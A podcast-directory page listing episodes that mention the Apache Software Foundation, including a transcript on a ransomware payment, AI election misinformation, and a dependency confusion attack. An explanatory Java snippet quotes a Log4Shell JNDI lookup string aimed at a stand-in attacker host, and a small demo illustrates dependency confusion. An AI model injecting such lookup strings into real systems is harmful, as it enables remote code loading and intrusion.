Podcasts about The Apache Software Foundation

  • 94 podcasts
  • 125 episodes
  • 40m average duration
  • 1 new episode monthly
  • Latest episode: May 13, 2025



Best podcasts about The Apache Software Foundation

Latest podcast episodes about The Apache Software Foundation

Hacking Humans
Log4j vulnerability (noun) [Word Notes]

Hacking Humans

Play Episode Listen Later May 13, 2025 9:16


Please enjoy this encore of Word Notes. An open source Java-based software tool available from the Apache Software Foundation designed to log security and performance information. CyberWire Glossary link: https://thecyberwire.com/glossary/log4j Audio reference link: “CISA Director: The LOG4J Security Flaw Is the ‘Most Serious' She's Seen in Her Career,” by Eamon Javers (CNBC) and Jen Easterly (Cybersecurity and Infrastructure Security Agency Director), YouTube, 20 December 2021.
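For readers who want to see the tool in question rather than just the vulnerability, here is a minimal, hypothetical sketch of everyday Log4j 2 usage. The class and the logged value are invented for illustration; the logger calls shown are Log4j 2's standard API.

```java
// Minimal sketch of typical Log4j 2 usage. PaymentService and userAgent are
// hypothetical; LogManager.getLogger and the parameterized info() call are the
// standard Log4j 2 API (requires log4j-api and log4j-core on the classpath).
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class PaymentService {
    private static final Logger logger = LogManager.getLogger(PaymentService.class);

    public void handleRequest(String userAgent) {
        // The Log4Shell flaw (CVE-2021-44228, affecting 2.0-beta9 through 2.14.1)
        // arose because attacker-controlled strings such as
        // "${jndi:ldap://attacker.example/a}" in logged data triggered JNDI
        // lookups; patched releases disable message lookups by default.
        logger.info("Handling request from user agent: {}", userAgent);
    }
}
```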

Word Notes
Log4j vulnerability (noun)

Word Notes

Play Episode Listen Later May 13, 2025 9:16


Please enjoy this encore of Word Notes. An open source Java-based software tool available from the Apache Software Foundation designed to log security and performance information. CyberWire Glossary link: https://thecyberwire.com/glossary/log4j Audio reference link: “CISA Director: The LOG4J Security Flaw Is the ‘Most Serious' She's Seen in Her Career,” by Eamon Javers (CNBC) and Jen Easterly (Cybersecurity and Infrastructure Security Agency Director), YouTube, 20 December 2021.

Founders Unfiltered
Ep 124: The Sri Lankan Unicorn ft. WSO2

Founders Unfiltered

Play Episode Listen Later Feb 9, 2025 54:59


Brought to you by the Founders Unfiltered podcast by A Junior VC - unscripted conversations with Indian founders about their story and the process of building a company. Hosted by Aviral and Mazin. Join us as we talk to Sanjiva Weerawarana, the founder of WSO2, about their story. Sanjiva earned his bachelor's and master's in Mathematics/CS from Kent State University, Ohio, and later completed a Ph.D. in Computer Science at Purdue University. He worked as a Research Staff Member at IBM and held visiting professorships at Purdue University, the Polytechnic Institute of New York University, and the University of Moratuwa. Beyond academia, he served on various committees, including the Arthur C. Clarke Institute, the University of Colombo, the University Grants Commission, The Apache Software Foundation, and several Sri Lankan institutions in technology, finance, and science. He founded multiple organizations, including WSO2 (2005), Thinkcube Systems, the Sahana Software Foundation, the Lanka Software Foundation, the Lanka Data Foundation, and the Avinya Foundation. Interestingly, he also served as a Lieutenant Colonel in the Sri Lanka Army.

Burning Man LIVE
A People's History of Burning Man - Volume 3

Burning Man LIVE

Play Episode Listen Later Dec 24, 2024 59:58


Back again by popular demand, here are more tales from Burning Man's oral history project, an ambitious endeavor to track down and talk with people who helped shape the culture as we now know it. Stuart and Andie share stories of early technology on the playa, and on the internet. Andie Grace aka Actiongrl interviews from the vantage of having co-created Burning Man's world of communications, from Media Mecca to this very podcast. Brian Behlendorf - technologist and open-source software pioneer. He developed Burning Man's online presence and connected people through the Venn diagram of luminaries from SF Raves, to Wired Magazine, to the Apache Software Foundation. David Beach - designer, creative director, and instigator of the impossible with early dynamic content on the web. He helped create Burning Man's first live streaming and web presence. Scott Beale - documentarian, founder of Laughing Squid, subculture super-connector of various tentacles of the meta-scene. Stuart Mangrum - zinester, cacophonist, billboard liberator, Minister of Propaganda, Director of the Philosophical Center, publisher of the first on-site newspaper of Burning Man (the Black Rock Gazette), and always in the same place at the same time as the characters in these stories of Burning Man's media experiments. With Andie Grace, Brian Behlendorf, David Beach, Scott Beale, and Stuart Mangrum. Links: Laughing Squid: Burning Man 1996 Netcast; dispatch2023.burningman.org; journal.burningman.org/philosophical-center; burningman.org/programs/philosophical-center; Burning Man Live: A People's History of Burning Man - Volume 2; Burning Man Live: A People's History of Burning Man - Volume 1. LIVE.BURNINGMAN.ORG

FeatherCast
Justin Mclean – ASF Board of Directors

FeatherCast

Play Episode Listen Later Sep 26, 2024 2:22


Are you interested in being a board member at the ASF? Justin Mclean is currently serving his fourth term as a board member at the Apache Software Foundation. In this short clip, he talks about his role there. Prefer video? …

The Cloud Gambit
Navigating Community, Open Source, and Brazilian Jiu-Jitsu with Tim Banks

The Cloud Gambit

Play Episode Listen Later Sep 24, 2024 59:52 Transcription Available


In this episode, we dive deep into the multifaceted world of Tim Banks, a Staff Solutions Architect at Caylent. Tim shares his remarkable journey from the US Marine Corps to becoming a prominent voice in the tech community. We explore the parallels between his experiences in tech, Brazilian Jiu-Jitsu, and community building, uncovering valuable insights on personal growth, professional development, and the state of open source. Whether you're a seasoned tech professional, a community organizer, or someone looking to break into the industry, this episode offers guidance on navigating the complex landscape of technology, community, and personal growth. Where to find Tim Banks - Twitter: https://x.com/elchefe; LinkedIn: https://www.linkedin.com/in/timjb/; GitHub: https://github.com/timbanks; YouTube: https://www.youtube.com/@elchefenegro; TikTok: https://www.tiktok.com/@timbanks71; Blog: https://tim-banks.ghost.io/. Show links - Caylent: https://caylent.com/; CNCF: https://www.cncf.io/; Apache Software Foundation: https://www.apache.org/; DevOpsDays: https://devopsdays.org/; Elastic license change: https://www.elastic.co/blog/elastic-license-v2; OpenSearch (Amazon's Elasticsearch fork): https://opensearch.org/. Follow, like, and subscribe! Podcast: https://www.thecloudgambit.com/; YouTube: https://www.youtube.com/@TheCloudGambit; LinkedIn: https://www.linkedin.com/company/thecloudgambit; Twitter: https://twitter.com/TheCloudGambit; TikTok: https://www.tiktok.com/@thecloudgambit

FeatherCast
Stefan Vodita: TAC recipient

FeatherCast

Play Episode Listen Later Sep 23, 2024 5:10


The Travel Assistance Committee (TAC) is a program at the Apache Software Foundation that helps cover the expenses of attending an ASF event, such as Community Over Code in Bratislava, where I interviewed Stefan Vodita, one of the recipients for …

FeatherCast
Shane Curcuru – Being a PMC Chair

FeatherCast

Play Episode Listen Later Aug 19, 2024 6:29


PMCs – Project Management Committees – at the Apache Software Foundation have a PMC Chair, who is a Vice President of the Foundation. And while that sounds very fancy and powerful, it's really not. Shane Curcuru, the PMC Chair of …

DeCent People
Ian LeWinter and Chris Davis

DeCent People

Play Episode Listen Later Jun 25, 2024 57:11


Ian is co-founder and president of Ingredient X, the film and software development studio specializing in blockchain, DeFi, and NFT technologies, including the creation of Film.io, a decentralized filmmaking ecosystem that places Hollywood decision-making onto the blockchain and into the hands of creators and fans. Chris, co-founder and CTO of Ingredient X, was a pioneer in the early days of WordPress and is a member of the Infrastructure team for the Apache Software Foundation. Follow Decential Media - Website: https://www.decential.io/; YouTube: https://www.youtube.com/@decentialmedia; Instagram: https://www.instagram.com/decential_media; TikTok: https://www.tiktok.com/@decential_media; LinkedIn: https://www.linkedin.com/company/decential-media/; Newsletter: https://decential.beehiiv.com/. Follow Matt Leising: https://twitter.com/mattleising

FeatherCast
Ivet Petrova Madzharova, Apache CloudStack PMC member

FeatherCast

Play Episode Listen Later Jun 24, 2024 3:53


At the recent Community Over Code in Bratislava, I had a number of conversations with people in various roles at the Apache Software Foundation. One of these was with Ivet Petrova Madzharova, marketing lead for Apache CloudStack. We talked about …

FeatherCast
Philipp Ottlinger talks about TAC, being a PMC Chair, and getting involved in open source

FeatherCast

Play Episode Listen Later Jun 21, 2024 5:36


At the recent Community Over Code event in Bratislava I had a series of conversations with participants from across the Apache Software Foundation about how and why they got involved, and how you can get involved. Philipp Ottlinger is a …

FeatherCast
Brian Proffitt – VP Marketing & Press at the Apache Software Foundation

FeatherCast

Play Episode Listen Later Jun 12, 2024


Have you ever considered getting involved at the Apache Software Foundation, but aren't sure where to get started? No matter what your skills are, there's a place for you. At Community Over Code in Bratislava, I spoke with Brian Proffitt, …

OpenObservability Talks
FOSS in Flux: Redis Relicensing and the Future of Open Source: OpenObservability Talks S4E12

OpenObservability Talks

Play Episode Listen Later May 30, 2024 61:35


In the past few years we've been witnessing tectonic shifts in the open source realm, with established projects taken off open source or otherwise turning to the dark side. On the other hand, we've seen active forks aiming to keep these projects open gaining momentum. What does it mean for the Free and Open Source Software (FOSS) movement? Is this a trend or just a passing wave? What can we learn from it as vendors and as a community? In this special episode concluding the fourth season of OpenObservability Talks, we will look back at the past year, including the very recent relicensing of Redis, and will discuss the state of open source with the help of open source pundit David Nalley. David has been involved in open source for nearly two decades. He is the director of open source strategy at AWS, currently serves as the President of the Apache Software Foundation, and serves on the Board of Directors for the Internet Security Research Group. The episode was live-streamed on 28 May 2024 and the video is available at https://www.youtube.com/watch?v=WV0ESadKuVI

OpenObservability Talks episodes are released monthly, on the last Thursday of each month, and are available for listening on your favorite podcast app and on YouTube. We live-stream the episodes on Twitch and YouTube Live - tune in to see us live, and chime in with your comments and questions on the live chat. https://www.youtube.com/@openobservabilitytalks https://www.twitch.tv/openobservability

Show Notes:
00:00 - Show intro and fourth season ending
00:55 - Episode and guest intro
09:50 - Redis relicensing off open source
16:34 - Is vendor-owned open source an oxymoron?
20:00 - Building a business plan around open source
27:52 - What it means for users when a project relicenses
35:08 - Open source is more than licenses and copyright
42:19 - Forks of relicensed projects to keep them open
49:55 - Open source strategy at AWS
53:39 - The role of OSS foundations
58:59 - Upcoming Community Over Code and KCD Czech & Slovak
1:00:01 - Outro

Resources:
Open Source Definition: https://opensource.org/osd
The Four Opens (Open Infra): https://openinfra.dev/four-opens/
Is Vendor-Owned Open Source an Oxymoron? https://horovits.medium.com/b5486a4de1c6
Redis is no longer open source: https://www.linkedin.com/posts/horovits_opensource-srecon-activity-7176599258156986369-3tJm/
Initiating the Valkey fork of Redis: https://www.linkedin.com/posts/horovits_redis-opensource-activity-7179186700470861824-Gghq/

Socials:
Twitter: https://twitter.com/OpenObserv
YouTube: https://www.youtube.com/@openobservabilitytalks
Dotan Horovits - Twitter: @horovits; LinkedIn: in/horovits; Mastodon: @horovits@fosstodon
David Nalley - Twitter: https://x.com/ke4qqq; LinkedIn: https://www.linkedin.com/in/davidnalley/

CHAOSScast
Episode 82: The AI Conundrum: Implications for OSPOs

CHAOSScast

Play Episode Listen Later Apr 25, 2024 39:16


In this episode of CHAOSScast, host Dawn Foster brings together Matt Germonprez, Brian Proffitt, and Ashley Wolf to discuss the implications of Artificial Intelligence (AI) on Open Source Program Offices (OSPOs), including policy considerations, the potential for AI-driven contributions to create workload for maintainers, and the quality of contributions. They also touch on the use of AI internally within companies versus contributing back to the open source community, the importance of distinguishing between human and AI contributions, and the potential benefits and challenges AI introduces to open source project health and community metrics. The conversation strikes a balance between optimism for AI's benefits and caution for its governance, leaving us to ponder the future of open source in an AI-integrated world. Press download to hear more!

[00:03:20] The discussion begins on the role of OSPOs in AI policy making, and Ashley emphasizes the importance of OSPOs in providing guidance on generative AI tools usage and contributions within their organizations.
[00:05:17] Brian observes a conservative reflex towards AI in OSPOs, noting issues around copyright, trust, and the status of AI as not truly open source.
[00:07:10] Matt inquires about aligning different policies from various organizations, like GitHub and Red Hat, with those from the Linux Foundation and Apache Software Foundation regarding generative AI. Brian speaks about Red Hat's approach of first figuring out its own policies before seeking alignment with others.
[00:06:45] Ashley appreciates the publicly available AI policies from the Apache and Linux Foundations, noting that GitHub's policies have been informed by long-term thinking and community feedback.
[00:10:34] Dawn asks about potential internal conflict for GitHub employees given different AI policies at GitHub and other organizations like CNCF and Apache.
[00:12:32] Ashley and Brian talk about what they see as the benefits of AI for OSPOs, and how AI can help scale OSPO support and act as a sounding board for new ideas.
[00:15:32] Matt proposes a scenario where generative AI might increase individual contributions to high-profile projects like Kubernetes for personal gain, potentially burdening maintainers.
[00:18:45] Dawn mentions Daniel Stenberg of cURL, who has seen an influx of low-quality issues from AI models. Ashley points out the problem of "drive-by contributions" and spam, particularly during events like Hacktoberfest, and emphasizes the role of OSPOs in education about responsible contributions. Brian discusses potential issues with AI contributions leading to homogenization and the increased risk of widespread security vulnerabilities.
[00:22:33] Matt raises another scenario, questioning whether companies might use generative AI internally as an alternative to open source for smaller issues without contributing back to the community. Ashley states that 92% of developers are using AI code generation tools and cautions against creating code in a vacuum, and Brian talks about Red Hat's approach.
[00:27:18] Dawn discusses the impact of generative AI on companies that are primarily consumers of open source, rarely contributing back, questioning if they might start using AI to make changes instead of contributing. Brian suggests there might be a mixed impact, and Ashley optimistically hopes the time saved using AI tools will be redirected to contribute back to open source.
[00:29:49] Brian discusses the state of open source AI, highlighting the lack of a formal definition and ongoing efforts by the OSI and other groups to establish one, and recommends a fascinating article he read from Knowing Machines. Ashley emphasizes the importance of not misusing the term open source for AI until a formal definition is established.
[00:32:42] Matt inquires how metrics can aid in adapting to AI trends in open source, like detecting AI-generated contributions. Brian talks about using signals like time zones to differentiate between corporate contributors and hobbyists, and the potential for tagging contributions from AI for clarity.
[00:35:13] Ashley considers the human aspect of maintainers dealing with an influx of AI-generated contributions and what metrics could indicate a need for additional support, and she mentions the concept of the "Nebraska effect."

Value Adds (Picks) of the week:
[00:36:59] Dawn's pick is seeing friends over the 4-day UK Easter holiday, playing board games, eating, and hanging out.
[00:37:21] Brian's pick is traveling back home to Indiana to see his first ever total solar eclipse and bringing his NC friends along.
[00:38:03] Matt's pick is reconnecting with colleagues this semester and doing talks at GSU and Syracuse.
[00:38:40] Ashley's pick is going to the local nursery and acquiring some blueberry plants.

Panelists: Dawn Foster, Matt Germonprez, Brian Proffitt, Ashley Wolf

Links:
CHAOSS (https://chaoss.community/)
CHAOSS Project X/Twitter (https://twitter.com/chaossproj?lang=en)
CHAOSScast Podcast (https://podcast.chaoss.community/)
podcast@chaoss.community (mailto:podcast@chaoss.community)
Georg Link Website (https://georg.link/)
Dawn Foster X/Twitter (https://twitter.com/geekygirldawn?lang=en)
Matt Germonprez X/Twitter (https://twitter.com/germ)
Brian Proffitt X/Twitter (https://twitter.com/TheTechScribe)
Ashley Wolf X/Twitter (https://twitter.com/Meta_Ashley)
Ashley Wolf LinkedIn (https://www.linkedin.com/in/ashleywolf/)
AI-generated bug reports are becoming a big waste of time for developers (TechSpot) (https://www.techspot.com/news/101440-ai-generated-bug-reports-waste-time-developers.html)
Models All The Way Down - A Knowing Machines Project (https://knowingmachines.org/models-all-the-way)
xkcd - Dependency (https://xkcd.com/2347/)
Special Guest: Ashley Wolf.

The Daily Decrypt - Cyber News and Discussions
AI in Elections: Guarding Against Misinformation, UnitedHealth’s Ransomware Dilemma, and The Peril of Dependency Confusion in Apache Cordova

The Daily Decrypt - Cyber News and Discussions

Play Episode Listen Later Apr 24, 2024


Join us for a crucial discussion on AI's impact on U.S. elections and cybersecurity, with insights from New York City Mayor Eric Adams and experts from Cloudflare and the Center for Internet Security. Discover how AI both threatens and protects our electoral integrity and what measures are being taken to combat misinformation and enhance security. In another essential segment, explore the recent ransom payment by UnitedHealth following a cyberattack on Change Healthcare. Learn about the challenges in protecting sensitive patient data and the implications of the breach on healthcare operations and cybersecurity policies. Finally, delve into the vulnerability of Apache Cordova App Harness in a dependency confusion attack, as reported by Orca and Legit Security. Understand the risks of using outdated third-party projects in software development and the steps taken by the Apache security team to address these vulnerabilities. For more detailed information: https://www.helpnetsecurity.com/2024/04/23/ai-election-misinformation/ https://www.cybersecuritydive.com/news/unitedhealth-paid-ransom-change-cyberattack/714008/ https://thehackernews.com/2024/04/apache-cordova-app-harness-targeted-in.html Follow us on Instagram: https://www.instagram.com/the_daily_decrypt/ Thanks to Jered Jones for providing the music for this episode: https://www.jeredjones.com/ Logo design by https://www.zackgraber.com/ Tags for the episode: AI, U.S. elections, cybersecurity, misinformation, Eric Adams, Cloudflare, Center for Internet Security, ransomware, UnitedHealth, Change Healthcare, data breach, Apache Cordova, dependency confusion attack, software security, open-source vulnerabilities. Transcript: It's official: UnitedHealth has confirmed that it paid a ransom to the cybercriminals that breached its subsidiary Change Healthcare. What additional measures are UnitedHealth taking to monitor and mitigate the fallout from this breach? AI is swiftly becoming a double-edged sword in U.S. elections, with over 60,000 daily cyber threats being mitigated against election bodies as we approach the critical 2024 election cycle. How can we balance the advancement of AI technology with the security and fairness of upcoming elections? And finally, researchers have discovered a vulnerability in the discontinued Apache Cordova App Harness project, allowing attackers to inject malicious code into the software supply chain, impacting unsuspecting users worldwide. So you may have heard that Change Healthcare was breached, and it caused a lot of problems. Well, it just came out that the UnitedHealth Group, which owns Change Healthcare, has admitted to paying a ransom during the cyber attack that occurred in February. Their aim was to prevent further exposure of sensitive patient data.
A spokesperson for UnitedHealth revealed to Healthcare Dive that the breach involved protected health information and personally identifiable information, which could potentially impact a vast number of Americans. Further complicating the situation, it was discovered that 22 screenshots of what appear to be stolen files were posted on the dark web. These images, some containing detailed patient health information, were accessible online for approximately one week. And anything that goes online is really hard to get back off. But UnitedHealth has confirmed its ongoing efforts to monitor the internet and dark web for any signs of the compromised data. The ransom payment details remain undisclosed. However, a UnitedHealth spokesperson emphasized that the payment was crucial to the company's strategy to safeguard patient information. Reports have been circulating about the ransom, with Wired Magazine last month suggesting that a known cyber group, ALPHV, or BlackCat, received a payment that looked suspiciously like a ransom transaction. Additionally, TechCrunch reported that another cyber group, RansomHub, has threatened further disclosures of sensitive records to extort money from UnitedHealth. So if you're not tracking that situation, there is an episode, I don't know, a month or so ago, that lays it out a little better. But BlackCat is assumed to have performed an exit scam on the dark web, and a new ransomware group called RansomHub acquired the data and is double-extorting UnitedHealthcare. UnitedHealth reports that medical claims, processing, and payment systems are slowly returning to normal, with Change now handling about 86 percent of its pre-incident payment volume. UnitedHealth anticipates that the financial toll from the cyberattack could reach $1.6 billion this year. It is also unlikely that Change will fully recover to its standard service levels before 2025. So in the wake of the incident, major healthcare associations have reached out to the HHS Office for Civil Rights, seeking clarification on who is responsible for issuing data breach notifications, to avoid redundancy and confusion among patients. UnitedHealth is preparing to take on the breach reporting and notification responsibilities for all customers potentially affected by this incident, marking a critical phase in addressing the fallout from this significant data breach. So it's no secret that the introduction of artificial intelligence, or large language models, or machine learning, or whatever you want to call it - ChatGPT - has really thrown a wrench into the content that's on the internet, from your advertisements, to actual news articles, to podcasts; anything you consume is now probably being touched by large language models in one way or another. And this is going to have a huge effect over the upcoming United States 2024 election cycle. As this election looms, the balance of power hangs between defending our digital frontiers and ensuring fair electoral processes. Recent reports from Cloudflare highlight the intensity of this battle, revealing over 60,000 daily cyber threats against U.S. election bodies, a staggering number that underscores the global stakes, with 70 elections in 40 countries also on the line this year. AI's dual nature presents a formidable challenge. It's a tool that can both safeguard and undermine the electoral process. The ease with which AI can fabricate convincing digital personas and disseminate misinformation across social platforms is alarming.
This capability has turned social media into a double-edged sword, prompting New York City Mayor Eric Adams to label it an environmental toxin. On the defense side, there is a pressing need for stringent AI regulation and robust cybersecurity measures. The Biden administration has responded by establishing a task force aimed at combating AI-generated misinformation and bolstering public awareness about the potential misuses of this technology. The legislative landscape is also evolving, with states like Texas and California pioneering criminal penalties for the misuse of AI in political campaigns, while several proposed bills in Congress seek to regulate AI more broadly. Check out the articles linked in our show notes for more information; it's a very interesting tactic that these states are using against the misuse of AI. To fortify our elections, experts suggest that political parties and candidates should consider appointing dedicated AI and data protection officers. This strategy parallels traditional physical security measures and is complemented by initiatives from organizations like the Center for Internet Security, which continues to refine tools that enhance the cybersecurity of election systems. Now, this isn't breaking news, but it continues to evolve as we get closer to the election, and we're not there yet. We're not in a place where we can confidently and accurately identify artificially created content and label it as such, or as untrue, or misleading. And the only way we'll ever be able to safeguard against this is with a foolproof method to do this labeling, remove the content from certain platforms, and just have an understanding of what constituents are consuming. We don't even have that. So we have a long way to go in the coming months, and we'll try to keep you posted here on the Daily Decrypt. And finally, for our more technical folks, a concerning vulnerability has been uncovered in an archived Apache project known as Cordova App Harness. This vulnerability, enabling what's called a dependency confusion attack, has researchers sounding the alarm. Dependency confusion attacks occur when package managers prioritize public repositories over private ones, allowing threat actors to sneak malicious packages into the mix. As a result, unsuspecting users may inadvertently download these fraudulent packages instead of the intended ones. According to a report by the cloud security company Orca, nearly half of organizations are vulnerable to such attacks. That's a lot. While fixes have been implemented by npm and other package managers to address this issue, the Cordova App Harness project was found to have a vulnerability of its own. The project, which was discontinued by the Apache Software Foundation in 2019, lacked proper internal dependency referencing, leaving it wide open to supply chain attacks. The security firm Legit Security (sounds legit) demonstrated how easy it was to upload a malicious version of the dependency, attracting over 100 downloads before being detected. This incident serves as a stark reminder of the risks associated with using third-party projects and dependencies, especially those that are no longer actively maintained. As security researcher Ofek Haviv points out, neglecting these projects can leave software systems vulnerable to exploitation. The Apache security team has since intervened by taking ownership of the vulnerable package. That's huge. But the episode underscores the importance of vigilance in software development practices.
So we're going to continue to rely on open source projects, but it is crucial to prioritize security and regularly update dependencies to mitigate potential risks. That's all we got for you today. Thanks so much for listening. If you're a fan of the podcast, please turn to Instagram or YouTube or Twitter and give us a follow, a like, and maybe a comment on one of the videos. We'd absolutely love to hear from you if you have any feedback, but until then, we will talk to you some more tomorrow.
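To make the mechanism described in this episode concrete, here is a small, hypothetical Java sketch of the naive resolution rule that dependency confusion exploits. Everything here (the ConfusionDemo class, the registry and version values) is invented for illustration; real package managers differ in their exact resolution logic.

```java
// Hypothetical sketch of why naive dependency resolution enables "dependency
// confusion": if the resolver simply takes the highest version seen across all
// configured registries, a public package can shadow an internal one.
import java.util.Comparator;
import java.util.List;

public class ConfusionDemo {
    record Candidate(String registry, int major) {}

    static Candidate resolve(List<Candidate> candidates) {
        // Naive rule: highest version wins, regardless of which registry it came from.
        return candidates.stream()
                .max(Comparator.comparingInt(Candidate::major))
                .orElseThrow();
    }

    public static void main(String[] args) {
        // The private registry hosts the real internal package at version 1;
        // an attacker publishes version 99 under the same name publicly.
        List<Candidate> candidates = List.of(
                new Candidate("private-registry", 1),
                new Candidate("public-registry", 99));
        // Prints "public-registry": the attacker's package wins on version alone.
        System.out.println(resolve(candidates).registry());
        // Mitigations include scoping names to specific registries, reserving
        // internal names publicly, or preferring the private registry explicitly.
    }
}
```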

FeatherCast
Lenny Primak: Apache Shiro

FeatherCast

Play Episode Listen Later Apr 19, 2024 14:29


Lenny Primak talks about Apache Shiro, the most recent release, and his journey at the Apache Software Foundation. Prefer video? That's on YouTube. Links: Project website: https://shiro.apache.org/ GitHub: https://github.com/apache/shiro

CHAOSScast
Episode 80: Counting Potatoes vs. Computational Mysticism - Using CHAOSS for Research

CHAOSScast

Play Episode Listen Later Feb 28, 2024 52:59


Thank you to the folks at Sustain (https://sustainoss.org/) for providing the hosting account for CHAOSScast! CHAOSScast – Episode 80. In this episode, host Georg Link is joined by Daniel, Anita, Sophia, and Sean to discuss their research experiences with CHAOSS metrics and software for open source community health analysis. They dive into various topics, such as collecting and interpreting data from different perspectives, considerations regarding privacy and ethics, and the importance of collaboration between academics and industry professionals. They also highlight some significant projects and studies where CHAOSS metrics and software were employed, and their hopes and concerns for the future direction of research in the field. Furthermore, they discuss the necessity of bridging the gap between academia and industry and touch on the importance of linguistics and cultural context when examining data. Download this episode now!

[00:02:48] Anita discusses the history of open source software research and how CHAOSS provides a common framework for various metrics used by researchers, and Sean emphasizes the standardization of metrics by CHAOSS, which aids in consistency across research.
[00:04:52] Sophia highlights the discrepancies in metric calculations and definitions, seeking standard methodologies, especially for non-academic publications, and Daniel reflects on the differences in research approaches between academia and industry, emphasizing the importance of methodological rigor.
[00:08:25] Sean critiques academic papers for often lacking complete method descriptions, calling for more rigorous methodological transparency, and Daniel shares about transitioning from academia to industry and the different expectations for communication and results.
[00:10:44] Georg inquires about the impact of CHAOSS research capabilities, and Daniel explains that CHAOSS is shaping research by reflecting the interests and observations of its contributors.
[00:12:16] Sean talks about the increased capacity for research offered by CHAOSS, particularly through tools like GrimoireLab and Augur; Anita shares her experience using GrimoireLab for creating interventions and dashboards for open source communities to monitor their projects; and Daniel adds historical context and mentions the importance of tools that allow the replication of analysis in research.
[00:17:10] Georg introduces a study using CHAOSS metrics and software that hasn't been officially published yet, and Sophia shares some details and explains the study's premise.
[00:21:00] Anita raises a philosophical point about the potential limitations of metrics, suggesting that they may only reflect what is observable and could lead to gamification if people optimize their behavior based on the metrics.
[00:22:14] Sean speaks about the importance of deep field engagement and the combination of social science with data mining to fully understand the data's underlying human behavior. Sophia shares her perspective from market research, discussing the design of surveys, the selection bias inherent in data collection, and the importance of understanding the population that is excluded by the research filters used.
[00:25:56] Anita discusses the challenges of academic surveys, and Daniel discusses the bias that may arise from the data available.
[00:28:10] Sophia contemplates the behavioral nuances dictated by different platforms' processes, and Sean suggests a focus on common software engineering processes across different tools and advocates for social scientific research in open source to better understand the human aspects.
[00:30:32] Georg transitions to discussing survey methodologies and their relation to CHAOSS metrics, and Anita shares her experiences with survey design and implementation for the international Apache Software Foundation community.
[00:33:10] Daniel reflects on the collaborative effort with the ASF community to ensure the survey's terms and questions were appropriately adapted for an international audience. Sophia suggests the need for a consistent taxonomy in research to ensure cultural sensitivity and understanding.
[00:36:15] Sean touches on the use of large language models in research to identify common language patterns, discussing the ethical considerations of using machine learning to evaluate inclusivity in projects. Anita shares thoughts on presenting survey data responsibly and the need for careful consideration of what information is shared.
[00:38:53] Georg questions the future direction for research in open source using metrics and software. Sean advocates for deeper social scientific engagement; Anita points out the silos between industry and academics, highlighting the need for more interaction and collaboration to synergize efforts and ask more relevant questions; and Sophia stresses the need to focus on gaps in data and to consider work not visible in trace data.
[00:42:59] Daniel brings a pessimistic view, cautioning that the different goals of industry and academia might lead to problems unless they find ways to work together more effectively.
[00:44:11] Georg asks Daniel to clarify the problems he foresees with the current research trajectories. Daniel elaborates on the potential ethical and legal issues that may arise when data is used beyond the limits of fair use, such as in mental health analysis from developer messages, and Sean and Anita add some thoughts as well.

Value Adds (Picks) of the week:
[00:47:09] Georg's pick is baking cookies.
[00:47:59] Sean's pick is a book he read called “Language Variation and Change in Social Networks.”
[00:48:31] Anita's pick is a book she is helping write on “Inclusive Open Source.”
[00:48:59] Daniel's pick is two books he read: “The Culture Map” and “From the Soil.”
[00:50:54] Sophia's pick is returning to FOSDEM, seeing people, and learning about a new tool called Cosma.

Panelists: Georg Link, Sean Goggins, Daniel Izquierdo, Anita Sarma, Sophia Vargas

Links:
CHAOSS (https://chaoss.community/)
CHAOSS Project X/Twitter (https://twitter.com/chaossproj?lang=en)
CHAOSScast Podcast (https://podcast.chaoss.community/)
podcast@chaoss.community (mailto:podcast@chaoss.community)
Georg Link Website (https://georg.link/)
Sean Goggins X/Twitter (https://twitter.com/sociallycompute)
Sophia Vargas X/Twitter (https://twitter.com/Sophia_IV)
Daniel Izquierdo X/Twitter (https://twitter.com/dizquierdo?lang=en)
Anita Sarma LinkedIn (https://www.linkedin.com/in/anita-sarma-0a82972/)
Mining Software Repositories (MSR) conference 2024 (https://2024.msrconf.org/)
CHAOSSCon EU 2024 Brussels Livestream (YouTube) (https://www.youtube.com/watch?v=GkVKYpwh5QE)
Language Variation and Change in Social Networks by Robin Dodsworth and Richard A. Benton (https://www.amazon.com/Language-variation-change-social-networks/dp/0367777509/)
The Culture Map by Erin Meyer (https://www.amazon.com/Culture-Map-INTL-ED-Decoding/dp/1610392760/)
From the Soil: The Foundations of Chinese Society by Fei Xiaotong (https://www.amazon.com/Soil-Foundations-Chinese-Society/dp/0520077962/)
Cosma on GitHub (https://github.com/graphlab-fr/cosma)
“Counting Potatoes: The Size of Debian 2.2” (UPGRADE - Open Source/Free Software: Towards Maturity) (https://robotica.unileon.es/vmo/pubs/upgrade.pdf)
“Gaining Insight into Your Open Source Community with Community Tapestry” (write-up for dashboard study for ASF) (https://docs.google.com/document/d/1VM9W2gKmh0AX4j_PSoghpqR6qkPuVjAdo_gkZZx8Imo/edit#heading=h.9ye7wft50hdx)
Special Guest: Anita Sarma.

FeatherCast
Cassandra Summit: Mick Semb Wever

FeatherCast

Play Episode Listen Later Jan 17, 2024 11:15


At Cassandra Summit 2023, in San Jose, California, I spoke with Mick Semb Wever about a variety of topics around the Cassandra community, the new Cassandra Catalyst program, and open source at the Apache Software Foundation. Cassandra: https://cassandra.apache.org/ Cassandra Summit: …

Giant Robots Smashing Into Other Giant Robots
507 - Scaling New Heights: Innovating in Software Development with Merico's Founders Henry Yin and Maxim Wheatley

Giant Robots Smashing Into Other Giant Robots

Play Episode Listen Later Jan 11, 2024 44:42


In this episode of the "Giant Robots Smashing Into Other Giant Robots" podcast, host Victoria Guido delves into the intersection of technology, product development, and personal passions with her guests Henry Yin, Co-Founder and CTO of Merico, and Maxim Wheatley, the company's first employee and Community Leader. They are joined by Joe Ferris, CTO of thoughtbot, as a special guest co-host. The conversation begins with a casual exchange about rock climbing, revealing that both Henry and Victoria share this hobby, which provides a unique perspective on their professional roles in software development. Throughout the podcast, Henry and Maxim discuss the journey and evolution of Merico, a company specializing in data-driven tools for developers. They explore the early stages of Merico, highlighting the challenges and surprises encountered while seeking product-market fit and the strategic pivot from focusing on open-source funding allocation to developing a comprehensive engineering metric platform. This shift in focus led to the creation of Apache DevLake, an open-source project contributed to by Merico and later donated to the Apache Software Foundation, reflecting the company's commitment to transparency and community-driven development. The episode also touches on future challenges and opportunities in the field of software engineering, particularly the integration of AI and machine learning tools in the development process. Henry and Maxim emphasize the potential of AI to enhance developer productivity and the importance of data-driven insights in improving team collaboration and software delivery performance. Joe contributes to the discussion with his own experiences and perspectives, particularly on the importance of process over individual metrics in team management. Merico (https://www.merico.dev/) Follow Merico on GitHub (https://github.com/merico-dev), Linkedin (https://www.linkedin.com/company/merico-dev/), or X (https://twitter.com/MericoDev). Apache DevLake (https://devlake.apache.org/) Follow Henry Yin on 